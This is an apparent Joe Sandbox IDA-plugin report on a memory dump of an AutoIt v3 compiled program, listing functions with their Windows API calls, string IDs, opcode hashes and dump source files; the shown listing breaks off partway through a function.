                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                          • API String ID: 2910397461-517079104
                                                                                                          • Opcode ID: c26ee6d50eb64836a8ecb28859440122d4ee9a221e66f023538cf9c598ac0756
                                                                                                          • Instruction ID: 77081c3559aa7e6361288c9453e62a8dfce4f3d2826fabae97e542b17c2a6827
                                                                                                          • Opcode Fuzzy Hash: c26ee6d50eb64836a8ecb28859440122d4ee9a221e66f023538cf9c598ac0756
                                                                                                          • Instruction Fuzzy Hash: 2AA15BB1A01219BFEB149BA5DC4AFAFBBA9EB48710F044155FA15B72E0C670AD04CF60
                                                                                                          Function 00EAB353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00EAB361
                                                                                                          • GetDriveTypeW.KERNEL32(?,00ED2C4C,?,\\.\,00ED0980), ref: 00EAB43E
                                                                                                          • SetErrorMode.KERNEL32(00000000,00ED2C4C,?,\\.\,00ED0980), ref: 00EAB59C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$DriveType
                                                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                          • API String ID: 2907320926-4222207086
                                                                                                          • Opcode ID: bb62f81360b7a0f18ebda318775ec24202c6314fa94bd097eac2a064aa23a83b
                                                                                                          • Instruction ID: 4616e933ee4ee92cb7840879c608781403c721dec0e9900b6f0a040980c651ba
                                                                                                          • Opcode Fuzzy Hash: bb62f81360b7a0f18ebda318775ec24202c6314fa94bd097eac2a064aa23a83b
                                                                                                          • Instruction Fuzzy Hash: 25517470F4420DEB8700EB60C942AB977E2BB8E344B247516E506BE2D3E771BE85DA51
                                                                                                          Function 00ECA041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00ECA0F7
                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00ECA1B0
                                                                                                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 00ECA1CC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 2326795674-4108050209
                                                                                                          • Opcode ID: ae6206aed396d07b037fe3eb5961c4b453205c8753abc89d12fa03c7db4c4173
                                                                                                          • Instruction ID: 000d440cecbb4c2dc92c13fbb08a77ea53bdc5772447d13b7bf6386d9800ef32
                                                                                                          • Opcode Fuzzy Hash: ae6206aed396d07b037fe3eb5961c4b453205c8753abc89d12fa03c7db4c4173
                                                                                                          • Instruction Fuzzy Hash: CB02DD30109308AFD719CF14CA49FAABBE4FB8531CF08952DF995A72A1C776D846CB52
                                                                                                          Function 00ECAF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetSysColor.USER32(00000012), ref: 00ECAF51
                                                                                                          • SetTextColor.GDI32(?,?), ref: 00ECAF55
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00ECAF6B
                                                                                                          • GetSysColor.USER32(0000000F), ref: 00ECAF76
                                                                                                          • CreateSolidBrush.GDI32(?), ref: 00ECAF7B
                                                                                                          • GetSysColor.USER32(00000011), ref: 00ECAF93
                                                                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00ECAFA1
                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00ECAFB2
                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00ECAFBB
                                                                                                          • SelectObject.GDI32(?,?), ref: 00ECAFC8
                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00ECAFE7
                                                                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00ECAFFE
                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00ECB013
                                                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00ECB05F
                                                                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00ECB086
                                                                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00ECB0A4
                                                                                                          • DrawFocusRect.USER32(?,?), ref: 00ECB0AF
                                                                                                          • GetSysColor.USER32(00000011), ref: 00ECB0BD
                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00ECB0C5
                                                                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00ECB0D9
                                                                                                          • SelectObject.GDI32(?,00ECAC1F), ref: 00ECB0F0
                                                                                                          • DeleteObject.GDI32(?), ref: 00ECB0FB
                                                                                                          • SelectObject.GDI32(?,?), ref: 00ECB101
                                                                                                          • DeleteObject.GDI32(?), ref: 00ECB106
                                                                                                          • SetTextColor.GDI32(?,?), ref: 00ECB10C
                                                                                                          • SetBkColor.GDI32(?,?), ref: 00ECB116
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                          • String ID:
                                                                                                          • API String ID: 1996641542-0
                                                                                                          • Opcode ID: ae5d0f37098dbd0268ef84cf0396a06d352bff96aea84eab3f33ab2a48e800a2
                                                                                                          • Instruction ID: bfc5453ef06879e806ac83c1fefaf6f1051a7422ba1363cc5750ece77cdf32bf
                                                                                                          • Opcode Fuzzy Hash: ae5d0f37098dbd0268ef84cf0396a06d352bff96aea84eab3f33ab2a48e800a2
                                                                                                          • Instruction Fuzzy Hash: 0B618A71902218BFDB119FA5ED49FAE7B79EF08320F18411AF925BB2A1C7719944CF90
                                                                                                          Function 00EC8FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00EC90EA
                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EC90FB
                                                                                                          • CharNextW.USER32(0000014E), ref: 00EC912A
                                                                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00EC916B
                                                                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00EC9181
                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EC9192
                                                                                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00EC91AF
                                                                                                          • SetWindowTextW.USER32(?,0000014E), ref: 00EC91FB
                                                                                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00EC9211
                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EC9242
                                                                                                          • _memset.LIBCMT ref: 00EC9267
                                                                                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00EC92B0
                                                                                                          • _memset.LIBCMT ref: 00EC930F
                                                                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00EC9339
                                                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00EC9391
                                                                                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 00EC943E
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00EC9460
                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EC94AA
                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EC94D7
                                                                                                          • DrawMenuBar.USER32(?), ref: 00EC94E6
                                                                                                          • SetWindowTextW.USER32(?,0000014E), ref: 00EC950E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 1073566785-4108050209
                                                                                                          • Opcode ID: e543b459f63d5626f0a86614f11d76845443714358d1bd3f208b46dc52ac551a
                                                                                                          • Instruction ID: feaf0bcdfdc799659d9f8b1b6832320e619dc96154e8288e1efa567671b298ee
                                                                                                          • Opcode Fuzzy Hash: e543b459f63d5626f0a86614f11d76845443714358d1bd3f208b46dc52ac551a
                                                                                                          • Instruction Fuzzy Hash: D4E1B170901208AFDB209F91DD89FEE7BB8FF05754F04915AF914BA292C7318A86DF20
                                                                                                          Function 00EC4ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCursorPos.USER32(?), ref: 00EC5007
                                                                                                          • GetDesktopWindow.USER32 ref: 00EC501C
                                                                                                          • GetWindowRect.USER32(00000000), ref: 00EC5023
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00EC5085
                                                                                                          • DestroyWindow.USER32(?), ref: 00EC50B1
                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00EC50DA
                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EC50F8
                                                                                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00EC511E
                                                                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 00EC5133
                                                                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00EC5146
                                                                                                          • IsWindowVisible.USER32(?), ref: 00EC5166
                                                                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00EC5181
                                                                                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00EC5195
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00EC51AD
                                                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00EC51D3
                                                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00EC51ED
                                                                                                          • CopyRect.USER32(?,?), ref: 00EC5204
                                                                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00EC526F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                          • String ID: ($0$tooltips_class32
                                                                                                          • API String ID: 698492251-4156429822
                                                                                                          • Opcode ID: 8464bc984f0b4ad87caec25308d852c5f0435ee4db8da8f112824cc9d3954649
                                                                                                          • Instruction ID: a4193cf826b40f47b9272c0a28b719db738d8fd16da62c7e9baa2c93645465c4
                                                                                                          • Opcode Fuzzy Hash: 8464bc984f0b4ad87caec25308d852c5f0435ee4db8da8f112824cc9d3954649
                                                                                                          • Instruction Fuzzy Hash: 0BB1A972604740AFD704DF25D989F6ABBE0FF88304F04991DF499AB2A1D771E846CB92
                                                                                                          Function 00EA498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00EA499C
                                                                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00EA49C2
                                                                                                          • _wcscpy.LIBCMT ref: 00EA49F0
                                                                                                          • _wcscmp.LIBCMT ref: 00EA49FB
                                                                                                          • _wcscat.LIBCMT ref: 00EA4A11
                                                                                                          • _wcsstr.LIBCMT ref: 00EA4A1C
                                                                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00EA4A38
                                                                                                          • _wcscat.LIBCMT ref: 00EA4A81
                                                                                                          • _wcscat.LIBCMT ref: 00EA4A88
                                                                                                          • _wcsncpy.LIBCMT ref: 00EA4AB3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                          • API String ID: 699586101-1459072770
                                                                                                          • Opcode ID: 6bea6a44e15a18aeb533ccc58d395c35833ad60f2434b23084fe6734d9a56f9c
                                                                                                          • Instruction ID: dc499321d796462e6bc282e278f093de18f5204490a401e77f1e38f5f2a6c81c
                                                                                                          • Opcode Fuzzy Hash: 6bea6a44e15a18aeb533ccc58d395c35833ad60f2434b23084fe6734d9a56f9c
                                                                                                          • Instruction Fuzzy Hash: 94411972A403047ADB11B730AD43EBFB7ECDF85350F04205AFA05BA1D2EB70AA0196B5
                                                                                                          Function 00E42BA9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286windowtimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E42C8C
                                                                                                          • GetSystemMetrics.USER32(00000007), ref: 00E42C94
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E42CBF
                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 00E42CC7
                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 00E42CEC
                                                                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E42D09
                                                                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E42D19
                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E42D4C
                                                                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E42D60
                                                                                                          • GetClientRect.USER32(00000000,000000FF), ref: 00E42D7E
                                                                                                          • GetStockObject.GDI32(00000011), ref: 00E42D9A
                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E42DA5
                                                                                                            • Part of subcall function 00E42714: GetCursorPos.USER32(?), ref: 00E42727
                                                                                                            • Part of subcall function 00E42714: ScreenToClient.USER32(00F077B0,?), ref: 00E42744
                                                                                                            • Part of subcall function 00E42714: GetAsyncKeyState.USER32(00000001), ref: 00E42769
                                                                                                            • Part of subcall function 00E42714: GetAsyncKeyState.USER32(00000002), ref: 00E42777
                                                                                                          • SetTimer.USER32(00000000,00000000,00000028,00E413C7), ref: 00E42DCC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                          • String ID: AutoIt v3 GUI$h
                                                                                                          • API String ID: 1458621304-1309884394
                                                                                                          • Opcode ID: acf86a0817d87421c6544df461e0df5cae2475881f595f722b2d1d13feb02e65
                                                                                                          • Instruction ID: 8eec4bf0724402ff15db0703bdd4d64d68d3b4d36b8a8a0ff1b3eec9b03dd73b
                                                                                                          • Opcode Fuzzy Hash: acf86a0817d87421c6544df461e0df5cae2475881f595f722b2d1d13feb02e65
                                                                                                          • Instruction Fuzzy Hash: F1B15E71A0020A9FDB14DF68EC89BAD7BB4FB48314F109269FA15B7290DB70E851DF54
                                                                                                          Function 00E60429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E51821: _memmove.LIBCMT ref: 00E5185B
                                                                                                          • GetForegroundWindow.USER32(00ED0980,?,?,?,?,?), ref: 00E604E3
                                                                                                          • IsWindow.USER32(?), ref: 00E966BB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Foreground_memmove
                                                                                                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                          • API String ID: 3828923867-1919597938
                                                                                                          • Opcode ID: 678020ee57b9b0aefb78badc2f762bfe640a7d33d92e9100163a29771eb61c2e
                                                                                                          • Instruction ID: 361ca2ac176edafa61b1c5b1128606cf8457b27551479e20a1737e749414f48b
                                                                                                          • Opcode Fuzzy Hash: 678020ee57b9b0aefb78badc2f762bfe640a7d33d92e9100163a29771eb61c2e
                                                                                                          • Instruction Fuzzy Hash: 64D18670104202EFCF04EF60D441AAABBF5BF54348F146A5AF856776A2DB30F959CB92
                                                                                                          Function 00EC441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00EC44AC
                                                                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00EC456C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharMessageSendUpper
                                                                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                          • API String ID: 3974292440-719923060
                                                                                                          • Opcode ID: 75d5c8c85cb6198e4432834ddbf97a1b23bbede3bb7c5e491627ed5fafcfe00e
                                                                                                          • Instruction ID: 18a909a2d3e5dc7b9e1f8acba5fb5c07f2547a188a5e6daae48b5fc43c1ab636
                                                                                                          • Opcode Fuzzy Hash: 75d5c8c85cb6198e4432834ddbf97a1b23bbede3bb7c5e491627ed5fafcfe00e
                                                                                                          • Instruction Fuzzy Hash: 4EA17EB02142159BCB14EF20DA61F6AB3E5AF85314F20696DF8567B2D2DB31EC0ACB51
                                                                                                          Function 00EB56C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00EB56E1
                                                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00EB56EC
                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00EB56F7
                                                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00EB5702
                                                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00EB570D
                                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00EB5718
                                                                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 00EB5723
                                                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00EB572E
                                                                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00EB5739
                                                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00EB5744
                                                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00EB574F
                                                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00EB575A
                                                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00EB5765
                                                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00EB5770
                                                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 00EB577B
                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00EB5786
                                                                                                          • GetCursorInfo.USER32(?), ref: 00EB5796
                                                                                                          • GetLastError.KERNEL32(00000001,00000000), ref: 00EB57C1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 3215588206-0
                                                                                                          • Opcode ID: 3a9dc65038770244ba9335d0b3bf09b7db7d2b5c7ceb946f8cfb817d9166981e
                                                                                                          • Instruction ID: aec3efb847f1eab00619bb768af7f2093e1f124d20a0e350fcbbcf46c889b07b
                                                                                                          • Opcode Fuzzy Hash: 3a9dc65038770244ba9335d0b3bf09b7db7d2b5c7ceb946f8cfb817d9166981e
                                                                                                          • Instruction Fuzzy Hash: 57414271E04319AADB109FBA9C49DAFFFF8EF51B10B10452BE519F7290DAB8A4008E51
                                                                                                          Function 00E9B13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00E9B17B
                                                                                                          • __swprintf.LIBCMT ref: 00E9B21C
                                                                                                          • _wcscmp.LIBCMT ref: 00E9B22F
                                                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E9B284
                                                                                                          • _wcscmp.LIBCMT ref: 00E9B2C0
                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00E9B2F7
                                                                                                          • GetDlgCtrlID.USER32(?), ref: 00E9B349
